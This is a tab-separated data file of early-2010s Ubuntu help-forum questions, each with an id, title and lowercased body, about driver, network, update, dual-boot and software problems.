217539	acer aspire one , wifi atheros communications inc. ar9462 problem with 12.10	i have an acer aspire one ao756-series , equipped with a wifi controller atheros communications inc. ar9462 everything worked fine on 12.04 , but when i upgraded to 12.10 i experimented some issues : wifi does work ! still , the wifi icon/menu does not react normally : it is always grey , hence not indicating if connected or not , it does not react to me clicking on it ( disconnect , change the network , desactive wifi , etc ) so it 's not a critical issue because i can change the active wifi connection through control pannel , but it is very annoying . do you know of an solution around this issue ?
217541	unable to run any video file format	whenever i try to run any video file in my ubuntu system movie player it asks for plugins installations as shown below but after i click on install button it gives an error that the package dependencies could n't be resolved .
217548	ca n't get hdmi connecto with my ati card	i know that there a lot of threads regarding this issue . but i have n't found a solution for my problem . first , my laptop is a : lenovo u550 intel cpu su 7300 . 4gb ram . graphic card is ati radeon hd 4330 switchable card with 512 mb i have installed ubuntu 12.04 64 bit standard installation . i wanted to use my hdmi connection to my living room tv , but there was no connection . here are the solutions i have tried : updating ubuntu repository , going to additional drivers and installing the rebooted my computer , navigated to the amd config app , got an error : saying that there is no graphic card . followed this guide what is the correct way to install ati catalyst video drivers ( fglrx ) ? the installation was ok , but when i rebooted i got an error like in this thread : how to fix `` the system is running in low-graphics mode '' error ? i tried doing all the solutions mentioned in the comments , no luck : ( every time i boot my computer it goes straight to tty1 screen . tried using startx but i get a server error . i reinstalled the desktop using apt-get install -- reinstall ubuntu-desktop , no luck ... as a last resort , and for taking pics of the process and errors i formatted my hard drive and installed ubuntu all over . this time after the installation the os did n't work at all , just got a blank page with _. checked the boot records and it was ok , also the ubuntu disk installation was out . at the moment i 'm using a win trail version . hoping to get some help , i do n't want to go back to windows , but if i 'm not able to fix this problem with my graphic card i will need to . my main use of my laptop is personal web use and as a living room computer , i connect it with a hdmi connection to my tv so this last function is crucial .
217549	ubuntu one on 11.10 not syncing correctly	i noticed that several days ago my ubuntu-one is not syncing correctly . i tried to restart the service with u1sdtool -- quit u1sdtool -- start also tryed with : u1sdtool -- quit u1sdtool -- connect u1sdtool -- refresh-shares with no luck . the status is : $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle if i create a file on my local ubuntu one folder , it does get synced , but i have a folder on my ubuntu one account ( created 2012-10-25 ) and it does not get synced to my local machine . i can not see anything with magicicada ( all is synced ) , and my syncdaemon.log shows this : 2012-11-15 12:27:35,140 - ubuntuone.syncdaemon.main - note - -- -- mark ( state : ; queue : 0 ; hash : 0 ) -- -- how can i force a full resync ?
217555	how to use verilog hdl on ubuntu ?	i tried to begin a small course with some examples in verilog hdl and after spending much time searching for the best simulator or ide to practice with some examples , i failed to figure out how to use it on ubuntu 12.04 so , i have two questions : how can i use verilog on ubuntu 12.04 ? what is the best simulator ( or ide ) available for linux ?
217561	how can i monitor the traffic of each wifi network that i have connected to ?	i have to `` roam '' a loot on different wifi networks and i would like to be able to see how much traffic i used on each wifi network that i have connected to . something like vnstat but summarized by essid instead of interface cheers jd evora
217565	could not see any options while installing amd catalyst via the .run installer	i downloaded the catalyst .run file from the amd website . but when i try to install it , i could not see the installer options . it shows like a blank page . screenshot :
217569	gimp fails to load raw file ( nef ) after upgrade to 12.10	i did and upgrade from ( k ) ubuntu 12.04 to 12.10 . it all worked well -- except for gimp . gimp 2.8 works fine but loading a .nef file ( a raw file from nikon ) fails with the message opening '/path/to/file/dsc_2605.nef ' failed : procedure 'file-ufraw-load ' returned no return values i have ufraw and gimp-ufraw installed . how do i find out what is wrong and how do i fix this ?
217570	bc : set number of digits after decimal point	bc handles numbers as integers : # echo `` 100/3 '' | bc 33 bc -l handles numbers as floating point objects : # echo `` 100/3 '' | bc -l 33.33333333333333333333 is there a way to limit the number of digits after the decimal point ?
217571	ca n't format / delete locked partition from gparted ?	i ca n't format my hard disk for ubuntu installation . it has fedora installed in it . i wonder how to unlock the locked partition to delete and format it , since i am stuck at installing ubuntu . i am now using a livecd to do the task . no options are available for me to use . screenshot :
217572	after power failure : get server auth dir /daemon/serverauthdir is set to , but dosent exist	after a power failure , on re-starting ubuntu linix , get message : `` gdm server auth dir ( daemon/servauthdir ) is set to /var/lib/gdm but it dose n't exist '' . the directory is there , but it does n't start volume manager properly , complains hald is not running and stops at a single command line . i have been trying to find out how to fix this for many months . can long-in as single user and startx , but no volumes apart from hard disks are found . familiar with unix but not as good on linix . any help would be appreciated .
217573	ethernet to nas , wifi to internet on same subnet	on my windows configuration , i use a wifi to connect to the interwebs : 192.168.1.x ( dhcp ) also on my windows configuration , i have a nas and a second computer with ubuntu connected via a switch on my ethernet port : 192.168.1.88 ( nas ) 192.168.1.214 ( computer ) it is now possible to surf , but also to connect to the nas via ip or name . also i do have configured a bridge in windows to allow the ubuntu pc to connect to the internet . this all works fine . but if i use my wifi stick on the ubuntu pc ( to surf ) and the ethernet switch to connect the ubuntu pc to the nas ( same as windows config ) , i ca n't ping or find the nas . i tried already to add a route route add -host 192.168.1.88 dev eth0 but this did n't help . why is this ? where do i have to configure something or change properties to make this work ?
217574	courier-imap with sendmail setup : why is my imap inbox empty ?	i 've successfully installed sendmail , but when i connect to the courier imap server via outlook , the inbox is listed as empty . when i check the inbox with alpine locally on the server , it has content though . why ? i do see files with content in /var/mail . is that not where courier-imap checks for mail ? the setup is pretty clean - i run ubuntu 12.04 on aws , have installed sendmail and courier-imap . sendmail was configured with sendmailconfigure and it works well to both send and receive mail . the problem is with courier .
217576	ubuntu studio/xubuntu 12.04 instead of ubuntu 12.04/12.10 for cad/ arhcitectural workflow . worth it ?	i am currently using ubuntu 12.10 . so , as described in the title i am planning to install ubuntu studio . the programs i use are blender , maya 2013 , nukex , bricscad , sketchup ( with wine ) and also i am planning to install revit architecture through virtualbox . well , i am using a quad-core cpu and i want to have all the power of my system for rendering/modelling . so , i decided to try a more lightweight desktop than unity . also , what made me to decide this , is that when i tried to install bricscad v12 the program does not work . so , i thought that if i want something more professional for my work i should have only lts versions of lightweight ubuntu . so , my 2 questions are :1 ) worth it ? 2 ) can i have global menu ( close , minimize , maximize buttons , menu ) like ubuntu/unity ? thanks
217578	webex audio does n't work on 12.04 lts 32-bit	i got `` the audio device is unaccessible now '' when trying to connect audio to webex session using computer . it 's known issue for 64-bit installations and common workaround is to setup 32-bit browser and java . it works , i saw it by myself . but i got the same issue on ubuntu 12.04 lts 32 bit . firefox 16.0.2 ( mozilla firefox for ubuntu canonical - 1.0 ) or chronium version 20.0.1132.47 ubuntu 12.04 ( 144678 ) - does not matter . java ( tm ) plug-in 1.7.0_09 . java 7 - oracle 32 bit : java -version java version `` 1.7.0_09 '' java ( tm ) se runtime environment ( build 1.7.0_09-b05 ) java hotspot ( tm ) server vm ( build 23.5-b02 , mixed mode ) does anyone know what could be wrong ? thank you in advance .
217579	how to make a windows virtualbox host recognise android usb ?	i want to root my phone ( micromax a52 ) and i got the procedure . but i use ubuntu for everyday use and now for rooting i need windows . i installed it in virtualbox . now in vbox , the usb device is recognised only if ubuntu recognizes it . ( all after installing the extention pack and adding the user to the vboxusers group ) but with the phone off for the flash process , how can i make the guest windows recognise the phone as ubuntu does not recognise i know its not a specific ubuntu question , but as the host os in ubuntu , i asked it here !
217581	is it possible to adjust the lfheight and lfwidth of arial in wine ?	i have a text scaling problem for the arial true type font in wine 1.5.17 . i have narrowed it down to the values lfheight and lfwidth returned by enumfonts . i 'm getting lfheight = 100 and lfwidth = 39 in wine 1.5.17 . the values for windows 7 is lfheight = 36 and lfwidth = 14 . is it possible to adjust these values for the arial font ?
217582	eclipse/aptana studio does n't start - error message is shown	i 'm using ubuntu 12.04 - 32bit and was working with aptana studio , when my laptop switched off cause of lack of energy supply . after booting , aptana and eclipse would n't start . eclipse showed following error message and did n't launch : jvm terminated . exit code=127 /usr/bin/java -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -os linux -ws gtk -arch x86 -showsplash -launcher /usr/lib/eclipse/eclipse -name eclipse -- launcher.library /usr/lib/eclipse//plugins /org.eclipse.equinox.launcher.gtk.linux.x86_1.1.100.dist/eclipse_1408.so -startup /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -- launcher.overridevmargs -exitdata 38000 -vm /usr/bin/java -vmargs -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar and aptana studio showed following error message in a window and did n't launch : -jvm terminated . exit code=127 -/usr/bin/java -- xms40m -- xmx512m -- declipse.p2.unsignedpolicy=allow -- declipse.log.size.max=10000 -- declipse.log.backup.max=5 -- djava.awt.headless=true -- jar /home/john/software/aptana studio 3//plugin -/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -- os linux -- ws gtk -- arch x86 -- showsplash -- launcher /home/john/software/aptana studio 3/aptanastudio3 -- name aptanastudio3 -- -launcher.library /home/john/software/aptana studio 3//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.100.v20110505/eclipse_1407.so -- startup /home/john/software/aptana studio 3//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -- -launcher.overridevmargs -- exitdata e8004 -- vm /usr/bin/java -- vmargs -- xms40m -- xmx512m -- declipse.p2.unsignedpolicy=allow -- declipse.log.size.max=10000 -- declipse.log.backup.max=5 -- djava.awt.headless=true -- jar /home/john/software/aptana studio 3//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar i then made updates . the software-center would n't start too . i could fix the software-center with reinstalling it with sudo apt-get install -- reinstall software-center reinstalled eclipse with sudo apt-get install -- reinstall eclipse reinstalled eclipse with the software center still the same error when starting eclipse or aptana-studio . any suggestions ?
217585	laptop screen does n't work after standby - hit or miss	i have an acer aspire 5750 and if i let my computer sit for 4hrs - 48 hrs , when i open up the laptop lid , my screen is black . the computer is still on , but it wo n't wake up . i use ctrl+alt+l to lock the computer . any help will be appreciated edit* this computer has the 2nd gen intel core i5 sandybridge integrated graphics . i had the same problem on 12.04 and 12.10 .
217586	can not install available update	i ca n't check to install this available update here is my problem about my ubuntu : i have tried it from terminal with sudo apt-get update , but it still unsolved
217587	ubuntu 12.10 64b does not shutdown	i am a new linux user so i am not familiar with what actually is needed to check . when shutting down or trying to restart i get a screen with yellow letters and the system does not close or restart . i have to shut down manually . i ca n't type all the numbers but i will give the last ones . [ 90102.232650 ] [ end-trace 435966f5b367871 ] this seems to have happened after i downgraded the xorg so i can get drivers for my ati card ( radeon hd 4850 ) . the suspend command works fine .
217590	dell vostro 3560 bluetooth does n't work	i installed the wireless driver using this instruction how do i install bcm43142 wireless drivers for dell vostro 3460/3560 and i have wifi working . no problems here . but unfortunately the bluetooth does n't work . the ubuntu bar shows the bluetooth sign and i can turn the bluetooth on/off but i ca n't discover any devices . and i ca n't find my laptop when i turn visibility on . so , obviously bluetooth does n't work . i could n't find the reports that blutooth can actually work with this adapter in ubuntu . so , my question is : is there anyone with bcm43142 adapter that have bluetooth working ? thank you in advance . ps . ubuntu 12.10 x64 update : after some fiddling around with different drivers from different sources i managed to get bluetooth working . not flawlessly but at least i can pair a device . bluetooth started working after installation of this package bt-bcm43142-onereic_0.0+20111116somerville2_amd64.deb originally i found this package on the disk with ubuntu which came with the laptop . what this package does , it installs a firmware loader and a firmware itself . this firmware needs to get bluetooth working . still bluetooth sometimes does n't work even with this package . but manual loading the firmware helps . brcm_patchram_plus_usb -- patchram /lib/firmware/bcm43142a0_001.001.011.0028.0036.hcd hci0 also i found it strange that this package writes all different ids into /sys/bus/usb/drivers/btusb/new_id because only one from the list matches my device id bcm43142.conf : install btusb /sbin/modprobe -- ignore-install btusb & & echo '0a5c 21d3 ' > /sys/bus/usb/drivers/btusb/new_id & & echo '0a5c 21d7 ' > /sys/bus/usb/drivers/btusb/new_id & & echo '0a5c 21e1 ' > /sys/bus/usb/drivers/btusb/new_id & & echo '0a5c 21e3 ' > /sys/bus/usb/drivers/btusb/new_id & & hciconfig hci0 up & & /usr/bin/brcm_patchram_plus_usb -- patchram /lib/firmware/bcm43142a0_001.001.011.0028.0036.hcd hci0 & my lsusb : ... bus 002 device 003 : id 0a5c:21d7 broadcom corp . in conclusion : bluetooth works not nearly as good as in windows : ( once i even got a complete crash of the system because of the btusb module . luckily wifi works perfectly : )
217593	wubi uninstallation and partitions question	i downloaded the wubi.exe file and before i install ubuntu , i want to make sure of some stuff first . i have two hard drives in my computer c : ( which have windows 7 on it ) 950 gb and d : which is empty and have 500 gb in it . i 'm wondering if when i choose the installation size 30 gb in wubi ( which is maximum ) it will only take 30 gb from my d drive and wo n't affect the rest and the c drive and whenever i uninstall wubi from control panel ( if i do n't like ubuntu ) , will i get my 30 gb back and will the d drive be back as it was ?
217596	ubuntu usb install ruined my c:	i tried to install ubuntu using usb . i followed instructions at ubuntu.com . in the middle of the installation , it stopped and opened try ubuntu mode when i restarted my pc ( the machine is running xp pro ) . i got this error when trying to load windows : disk read error restart ctrl + alt +del yes , i tried to install ubuntu alongside my windows installation . i have 2 harddrives on my pc . both have win xp pro . i can access the c drive with the second hard drive with no problem . but , win xp wont start on the c drive anymore . only d works . so any help and yes ubuntu caused all this
217599	running driver-select script gives error 1 and 2	i am trying to install an atheros driver update and i am using this package : compat-wireless-2012-11-13-pc . i have not installed ubuntu on disc , but am running it from the usb , running this code : ./scripts/driver-select alx make sudo make install this runs a bunch of stuff . at the end i get error 1 and error 2 and still ubuntu does not recognize my driver , even upon reboot . what else am i supposed to do ?
217606	undelete files on ext4	my mother has placed some important files on her /tmp per accident . now , of course , they are gone . this happened yesterday ( 2 boots of the machine since ) i want to try to undelete the files . they were on /tmp , which was on the same partition as the rest of / , so i need a tool that runs on a mounted system ( or maybe i could use a livecd ... ) right now , i am trying testdisk on a systemrescuecd that i just downloaded . i can get some files from /tmp , but not all . ( is it the right tool ? what exactly are those `` red '' files ? are only some of them recoverable ? )
217611	how to create a dedicated user for running a service ?	i have an application that i want to run as a service on system-start , and that application should run as a specific user ( the application is apache karaf ) . i have all this setup , but the user i am using for this has a password , so every time the service is started , the password of that user has to be entered . i currently have a user with the following entries in /etc/passwd and /etc/shadow : # /etc/passwd karaf-test-user : x:1002:1002 : :/home/karaf-test-user : /usr/sbin/nologin # /etc/shadow karaf-test-user : :15659:0:99999:7 : : : as far as i can see this user does not have a password set , it can not log in , but it does have a home-directory ( this is required for the application ) . however , when i type : /etc/init.d/karaf-service start i am prompted for the password of that user . how can i prevent this ? how can i modify this user to not require a password at this point ? i have found this answer , but it seems hacky to me . is this really the only way ? are there any best practices to respect ? i am running on ubuntu 12.04.1 .
217612	why my upstart script does n't run ?	i do n't understant why my script is not running . here is what i did ( i 'm using ubuntu 10.04 ) . i wrote a mountftp.conf script : description `` mount the remote ftp for sync '' start on started tty1 task script curlftpfs ftp : //admin:123456 @ 195.78.27.45 /ftp/ end script i saved the script in /etc/init/ folder . if i use the command `` service mountftp start '' it works , but it does n't want to automatically start on boot ... i also tried with `` strat on stratup '' with no luck . i also added some log to the script to check if it is executed or not , and it is not executed at all .
217614	lubuntu 12.04 wo n't do apt-get update	i just finished installing lubuntu 12.04 . when i try to run apt-get update i get a whole lot of errors : w : failed to fetch [ lists my repos ] e : some index files failed to download . i tried with many , many different repos besides the official ones that come with the default out-of-the-box installation . here 's my /etc/resolv.conf file : nameserver xxx.xxx.xxx.xxx nameserver xxx.xxx.xxx.xxx nameserver xxx.xxx.xxx.xxx search la.xx.com and my /etc/network/interfaces file : auto eth0 iface eth0 inet dhcp dns-nameservers xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx ( same nameservers as above ) and this is the output of ifconfig : eth0 link encap : ethernet hwaddr 00 : e0:52 : bc:81:95 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :2e0:52ff : febc:8195/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:26676 errors:0 dropped:0 overruns:0 frame:0 tx packets:86212 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2246688 ( 2.1 mib ) tx bytes:7211192 ( 6.8 mib ) interrupt:11 base address:0x1400 the weird this is , i have access to the internet having configured chromium with a socket to connect to . i am wondering if i still need ( and where ) to specify a proxy to do apt-get update . look forward to reading your suggestions . thanks in advance .
217619	ubuntu 12.10 does n't recognize graphic chip in intel celeron g540t	i want to use ubuntu and get away from windows . i have bought a new fujitsu ts esprimo q510 mini pc a few days ago . but its integrated cpu isnt properly recognized by ubuntu 12.10 . the screen resolution is very low and in settings i can only switch between 2x 4:3 format resolutions . but i have a full hd 16:9 display . if i choose 12.04 the resolution is correct and the screen looks fine but i still have some tearing and kind of stuttering if i scroll down , especially in firefox . this is the cpu : http : //ark.intel.com/products/53417/intel-celeron-processor-g540t-2m-cache-2_10-ghz i think the intel hd2000 is build in and working here , correct ? this chip is often used in many other cpu i think so i cant understand why the latest ubuntu version skips the support for this chip ? any solution for this ? im not the terminal geek so it would be nice if there is a easy solution . thanks in advance !
217623	unable to install upgrades ubuntu 11.10	i received the following error when trying to install updates . unsure of how to correct the problem without a reinstall . suggestions to repair appreciated . installarchives ( ) failed : extracting templates from packages : 78 % % extracting templates from packages : 100 % % extracting templates from packages : 78 % % extracting templates from packages : 100 % % extracting templates from packages : 78 % % extracting templates from packages : 100 % % ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libicu4j-java ' : is a directory error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 )
217627	dual monitor setup.workspace switcher allignment problem	i have a dual monitor setup.the two monitors have different sizes and resolutions.when i use the workspace switcher option , i see the screens as shown in the screenshot . why cant i see all the workspaces on the monitor on the right ? there is a part missing on the left and extra space on the right .
217631	quantal : suddenly , notify-osd does n't show bubbles	using quantal and do n't see notify bubbles anymore on my desktop . using the command notify-send , i see that if i do in the terminal notify-send -u critical test test , i see the bubble showing up . but if i do : notify-send -u normal test test or just notify-send test test i see no bubbles ! maybe do not disturb mode has been applied probably , but i do n't know how/when ! $ notify-send -- version notify-send 0.7.5 $ apt-cache policy notify-osd notify-osd : installed : 0.9.34-0ubuntu5 candidate : 0.9.34-0ubuntu5 version table : *** 0.9.34-0ubuntu5 0 500 http : //archive.ubuntu.com/ubuntu/ quantal/main amd64 packages 100 /var/lib/dpkg/status
217635	how to rename an ethernet interface ?	as my built-in nic was not supported by ubuntu out-of-the-box i was forced to use a usb nic for temporary installation-time internet connection . and the usb nic has taken the eth0 name making the built-in nic to become eth1 . sure , this does n't really matter but just for the system `` prettiness '' i would like eth1 to become eth0 letting any newly attached nic to become eth1 . is this possible ?
217642	how do i reposition conky ?	i successfully installed the `` gotham '' conky on my 12.04 desktop using these instructions it works perfectly , positioned in the top-right side of my desktop , and i am happy every day of the week except `` wednesday '' . because of the length of the word `` wednesday '' , unfortunately the `` y '' trunctates off the screen ( to the right ) . i would like to reposition the conky , ( preferablably keep it top-right ) but nudge it to the left so the `` y '' is visible on the screen . any `` how to '' instructions will be gratefully received .
217643	fn+f7 issue ( it should turns backlight on/off )	i 've just registered to this forum and i would like to know how to fix this problem . it really drives me crazy , i 've already tried to solve this for months but nothing . i have ubuntu 12.10 and the combination fn+f7 ( backlight on/off ) and fn+f9 ( check system properties ) do n't work . does anyone know how to fix this problem ? thanks in advance . dimix
217644	how can i change proxy settings ( username , password ) in ubuntu one 3.0.2b on windows7	i am using ubuntu one on windows 7 and i try to connect to my account via proxy server . unfortunately i used a wrong username for proxy bypass so the connection failed . however ubuntu one does not allow me to change this username it always tries to connect with the first one wrong username . re-installing the ubuntu one did not help ... is there anything else i should do ? many thanks for any answer .
217645	how can i stop being prompted to enter my password when installing a webapp ?	everytime i click on install a webapp it asks me to enter my password . is there a way to bypass this ?
217646	install ubuntu 12.x	i want to install ubuntu 12.04 or 12.10 in my 64bit windows 7 laptop . i decided to get rid of windows 7 and want to have only ubuntu in my laptop , so would you please give me a clear instructions that i have to follow to install ubuntu ? btw , which ubuntu ( 12.04 or 12.1 ) is more stable ? thank you
217648	how do i configure the system ?	i 've just installed ubuntu 12.04 and am completely stuck on how to administer the system . initially i just want to open a port on the firewall , but there does n't seem to be any obvious way to do that . i 've found a `` system settings '' panel , but there is almost nothing on it , and the network panel is pretty empty too . i 've clicked on various things , but there is almost nothing anywhere . i ca n't even find an `` applications '' menu . am i missing something here ?
217649	how to configure ubuntu to connect to a tacacs server	i have two ubuntu workstations which i want to configure to use our tacacs+ server for logon rather than their local accounts . how do i configure the workstation to use the tacacs servers ?
217653	problem with two dual screens - nvidia	i have a problem with nvidia-settings . when i consider the twinview configuration , both screens work correctly . however , when i try to log on my laptop ( without the secondary screen ) . i can not do anythng , i can not lanch a terminal or event use the mouse .. habve you ever experiment this ? any idea ? thanks ,
217662	can i use sonycybershot digital camera for videochatting	i have an hp laptop which have a built in web camera . it has low visual clarity . so i like to use my digital camera as web cam . is it possible . if yes , how ? which software is suitable for that ? camera have usb cable .
217665	xampp : deamon is already running , but it 's not apache	this one is giving me a headache ... i have installed xampp for linux 1.7.7 on ubuntu 12.10 . i have n't installed the latest version because of the new security `` feature '' which makes xampp so secure i ca n't get it running . but that 's another story . after it installed and ran ok for a couple of months , i now get the famous xampp : another web server daemon is already running . error while starting xampp . now i 've googled extensively and can rule out the following : there is no other apache installation , just xampp there are no apache or apache 2 services running there are no services running that use port 80 ( checked with netstat -an grep -w 80 ) i have also done a fresh install of xampp 1.7.7 , but that gives me the same result . i think i have tried every solution on the first two result-pages of google and am nowhere nearer to a solution . can anyone give me pointers on how to find the mysterious webdeamon that is already running ? i changed the port that xampp listens to in httpd.conf , which , in my case , is located in the /opt/lampp/etc/ folder . i changed the option listen , as that was the only option that had a value of 80 . still i get the deamon already running-error . the output of the netstat command is the following : tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1189/tntnet tcp 0 0 192.168.178.52:35048 91.189.94.25:80 established 2350/ubuntu-geoip-p tcp 0 0 192.168.178.52:35047 91.189.94.25:80 time_wait - i have killed the ubuntu-geoip-p service and could n't find a way to kill the tcp service , but i do n't think the tcp service must be killed in order to start apache . anyway , after this i still got the same error . any other suggestions ? lsof -i :80 gave a different output and i saw that tntnet also used port 80 . uninstalled tntnet and apache started as normally . problem solved ! thanks for the info .
217667	how to enable home directory encryption for a particular user ?	i prefer to have a dedicated `` administrator '' user for technical purposes and that was one i 've set up during installation . i 've also refused to encrypt the home folder of the user . now , as i 've added a user account for my actual work usage i want my ( but not the `` administrator '' ) home folder to be encrypted . how to turn this on ? if it is not possible then how to enable encryption for all users home directories on a system already installed ? i 've found questions and answers about how to disable it but am not sure how to enable it .
217668	ubuntu server 12.04 locksup when starting the gnome desktop	i installed the latest release of the ubuntu server 12.04.1 lts . all loads fine . i chose the lamp install , also goes fine . to test the apache 2 i need to use a gui desktop so i loaded the gnome gui and restarted the system . the server boots up , starts the gnome desktop and locks . help
217673	how to restart colord	a tiff security update came out today for 12.04 and colord is still running with the older shared library # lsof -n | grep del | grep /lib colord 3454 colord del reg 252,1 3673529 /usr/lib/x86_64-linux-gnu/libtiff.so.4.3.4 besides restarting the whole system , given there 's no /etc/init.d/colord , how do i restart it so it picks up the new libtiff.so .
217674	how to revert to 10.04	since `` upgrading '' to 12.10 , the multitude of problems and slowness has wondering me , if i 'm running windows , so i want to take it back to 10.04 . just some of the problems that we never had in 10.4 : ca n't play youtube and chat at same time ; ca n't open more than 5 photos in gimp without constant grayouts ; ca n't easily close apps or programs on desktop ; ca n't use avidimux and audacity at same time , cpu load stays at 100 % ; new gnome is not nearly as intuitive as classic , focus is all over the place , have to constantly switch to have the focus on right window of same program ( either browser ) , etc . do i need to wipe my system partition and start over , or is there an easier way to downgrade ?
217676	how do i find out whether my system has usb 3.0 ports ?	i want to buy an external usb 3.0 drive and i wonder how to figure out whether my laptop has such a port ( or only 2.0 ) . neither lsusb -v , nor /proc/bus/input/devices offers any obvious hints , although the former says a lot of 2.0 root hub which might imply v2 and not v3 . right ?
217678	bt home hub 2.0	i have used my old bt home hub with no problems . but now i have upgraded it and it works fine on my windows laptop but although lubuntu sees it , it can not connect and is stuck on `` obtaining ip address '' . no problem with both htc explorer 's ( android ) so not just linux . i am using ndiswrapper , by the way .
217682	desktop icon not showing	i have installed ubuntu 12.04 and using it with gnome . i can not see my computer icon , home folder icon in my desktop . in cinnamon settings the options to show them is enabled . thank you !
217687	how to dual boot windows 7 and ubuntu 12.10 ?	so firstly i tried to install ubuntu , from the website to run alongside windows . went through wubi etc . asked me if i wanted to try or install , i selected install . i selected option to run alongside windows 7 but when it was partitioning it failed and i only had the fresh install as an option as probably windows became corrupt then ? so i installed windows again , ran ubuntu from the livecd , went into gpartition , did n't really know what i was doing but anyhow , resized a partition which was 698gb , one was 100mb , i guessed cd drive . gparted said it was gon na take three hours , so i took that for meaning windows was corrupt again . your help is greatly appreciated . thanks
217689	contacting pulse audio over dbus ?	i am trying to write a basic volume application . since i 'm writing this in ruby i do n't want to extend the c library or use ffi , instead i trying to write this with ruby-dbus i got the address property with /org/pulse_audio/server_lookup1 but the file the address points to does n't exist . is pulse audio properly configured for dbus ?
217691	12.04 wo n't recognize ethernet connection on my toshiba satellite	like the title says , i have just installed ubuntu 12.04 on my toshiba satellite p875-s7200 and i can connect to the internet via wifi but my computer does n't seem to recognize when i plug in a wired connection . i know that there are no drivers on the toshiba site that have anything to do with linux as far as i can tell , and i have all the drivers for my windows partition ( which works flawlessly wired and wifi ) . is there something simple that i am not doing to help it recognize the ethernet connection ? thanks for your responses !
217692	i ca n't remove my skype at ubuntu 12.04	for the 1st time i know there is a good news that we can use the newest skype for ubuntu so i need to remove the latest ubuntu to get it install safety but while i try to uninstall skype via terminal all i have is > santos @ santos : ~ $ sudo apt-get remove skype [ sudo ] password for santos : > reading package lists ... done building dependency tree reading > state information ... done package skype is not installed , so not > removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . > 3 not fully installed or removed . after this operation , 0 b of > additional disk space will be used . setting up virtualbox > ( 4.1.12-dfsg-2ubuntu0.2 ) ... traceback ( most recent call last ) : file > `` /usr/bin/pycentral '' , line 2372 , in < module > > main ( ) file `` /usr/bin/pycentral '' , line 2366 , in main > rv = action.run ( global_options ) file `` /usr/bin/pycentral '' , line 1529 , in run > self.options.exclude , byte_compile_default=true ) file `` /usr/bin/pycentral '' , line 1097 , in install > rt.byte_compile ( linked_files , bc_option , exclude_regex , ignore_errors ) file `` /usr/bin/pycentral '' , line 231 , in byte_compile > shell=false , stdin=subprocess.pipe ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ > errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child > raise child_exception oserror : [ errno 2 ] no such file or directory dpkg : error processing virtualbox ( -- configure ) : subprocess installed > post-installation script returned error exit status 1 dpkg : dependency > problems prevent configuration of virtualbox-qt : virtualbox-qt > depends on virtualbox ( = 4.1.12-dfsg-2ubuntu0.2 ) ; however : package > virtualbox is not configured yet . dpkg : error processing virtualbox-qt > ( -- configure ) : dependency problems - leaving unconfigured dpkg : > dependency problems prevent configuration of virtualbox-dkms : > virtualbox-dkms depends on virtualbox ( > = 4.1.12-dfsg-2ubuntu0.2 ) ; > however : package virtualbox is not configured yet . dpkg : error > processing virtualbox-dkms ( -- configure ) : dependency problems - > leaving unconfigured no apport report written because the error > message indicates its a followup error from a previous failure . > no apport report written because the error message indicates its a followup error from a previous failure . > errors were encountered while processing : virtualbox virtualbox-qt > virtualbox-dkms e : sub-process /usr/bin/dpkg returned an error code > ( 1 ) santos @ santos : ~ $ what was this all about and why it related to virtualbox .. well i have it but long time not using it until this time .
217693	is there an easy way to set up a home ftp server ?	i have more then one computer at home , and i would really like if i could set up a home ftp server to access all of the files ? the wifi router is connected to a pc that runs ubuntu 12.10 and files are stored on it that i want to access from other systems . the other systems are — two pcs that use windows 8 and with one that uses windows 7 . will it work ? so is there an easy way to do this ?
217698	how to build a particular version of gcc ( 4.5.1 ) ?	in my office we have gcc-4.5.1 , with that version my c++ project works fine . if i compile the same project at home with ubuntu 12.04 with gcc-4.6 , i have lot of errors and i could n't compile at all . i spent some time on the internet to build the gcc from sources but the installation had lot of issues and the build is broken . i am looking for a way to downgrade my gcc version to 4.5.1 . if someone can also give a step by step way of compiling gcc from sources would be appreciated .
217701	how to disable nautilus-dropbox in kde ?	on ubuntu 12.10 64bit i additionally installed kubuntu-desktop . i installed dropbox in unity to use it there with nautilus . in kde this is not the wanted behavior so i installed the dropboxd - daemon and enabled it to autostart in kde . but the nautilus-dropbox applet is always started in addition to the daemon . how can i make sure that there is only the dropboxd running and not the nautilus-dropbox when i use kde and when using gnome i llike to use nautilus-dropbox ? plz note that there is no setting for nautilus-dropbox in kde autostart applications ! maybe there is a way to install two versions and make sure only the right one is started with each desktop environment ?
217706	password on resume	i would like to not have to enter my password on resume after closing the lid on my laptop . i used to be able to do this but ca n't find the option anywhere anymore . all the notes i have found say go to `` screensaver '' but when i type `` screensaver '' into the dash , nothing comes up .
